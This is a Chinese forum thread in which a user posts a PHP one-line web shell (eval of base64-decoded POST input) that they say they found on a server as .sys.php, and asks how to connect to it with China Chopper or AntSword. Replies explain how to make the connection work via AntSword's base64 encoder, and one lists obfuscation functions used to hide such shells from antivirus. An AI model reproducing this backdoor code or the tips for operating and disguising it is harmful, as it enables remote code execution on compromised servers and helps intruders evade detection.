导航

这个一句话是怎么连接的

#1
服务器发现一句话,请教这个是怎么利用的。用菜刀和蚁剑简单链接一下发现错误,页面存在,但是无法获取密钥! 是需要构造语句吗。

文件名: .sys.php
文件内容:
<?php
@eval(base64_decode($_POST[sys]));
?>
2020-11-09
#2
蚁剑编码器 试下<

评分记录

2020-11-09
#3
蚁剑选base64应该可以连
2020-11-09
#4
base64加密过的php语句执行,sys字符好像要加引号
2020-11-09
#5
base64编码一下再连
2020-11-09
#6
回复 调用了base64_decode二三楼base传参正解1# bmorgr
2020-11-09
#7
这是最基本的小马 执行POST过去的sys参数内容BASE64编码 很容易被各类防毒查杀
常见会用来混肴的函试 除了 encode decode 类 还有 字串的取代 str repalce reverse 之类的
2020-11-09
#8
这就是简单的base64编码了一下,亲测蚁剑可以直连
2020-11-09
#9
谢谢,已经解决了。